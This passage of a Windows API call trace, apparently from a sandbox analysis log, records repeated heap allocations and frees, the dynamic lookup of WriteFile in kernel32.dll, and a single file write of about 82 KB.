(in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0161.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0161.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0161.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0161.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0161.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0161.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0161.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0161.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0161.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0161.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0161.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0161.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0161.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0161.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0161.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0161.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0161.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0161.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0161.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0161.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0161.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0161.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0161.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0161.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0161.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0161.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0161.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0161.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0161.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0161.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0161.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0161.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0161.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0161.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0161.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0161.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0161.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0161.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0161.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0161.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0161.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0161.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0161.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0161.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0161.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0161.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0161.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0161.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0161.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0161.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0161.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0161.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0161.411] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0161.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0161.411] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0161.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0161.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0161.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0161.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ad0 [0161.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0161.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0161.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0161.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0161.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a20 [0161.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0161.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0161.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0161.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0161.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0161.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0161.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0161.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0161.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0161.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0161.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0161.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0161.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0161.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0161.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0161.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0161.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0161.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1960 [0161.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0161.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0161.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0161.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a00 [0161.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0161.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd648 [0161.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0161.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0161.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0161.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0161.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0161.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0161.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0161.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0161.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0161.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0161.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0161.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0161.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0161.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0161.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0161.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0161.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0161.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0161.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0161.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0161.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0161.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0161.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0161.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0161.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0161.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0161.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0161.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0161.413] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0161.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0161.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0161.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0161.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0161.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0161.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0161.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0161.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0161.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0161.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0161.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0161.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0161.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0161.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0161.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0161.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0161.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0161.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0161.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0161.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0161.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0161.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0161.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0161.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0161.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0161.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0161.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0161.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0161.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0161.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0161.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0161.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0161.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0161.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0161.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0161.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0161.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0161.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0161.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0161.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0161.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0161.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0161.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0161.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0161.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0161.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0161.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0161.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0161.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0161.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0161.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0161.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0161.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0161.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0161.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0161.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0161.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0161.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0161.416] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0161.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0161.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0161.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0161.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0161.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0161.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0161.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0161.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0161.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0161.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0161.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0161.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0161.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0161.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0161.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0161.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0161.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0161.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0161.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0161.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0161.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0161.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0161.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0161.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0161.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0161.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0161.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0161.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0161.417] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0161.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0161.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bd6f0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0161.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0161.417] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0161.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0161.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0161.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0161.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0161.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0161.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0161.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0161.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0161.417] WriteFile (in: hFile=0x138, lpBuffer=0x9c5180*, nNumberOfBytesToWrite=0x14234, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesWritten=0x87eae0*=0x14234, lpOverlapped=0x0) returned 1 [0161.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0161.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0161.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0161.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0161.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0161.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0161.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0161.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0161.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0161.418] 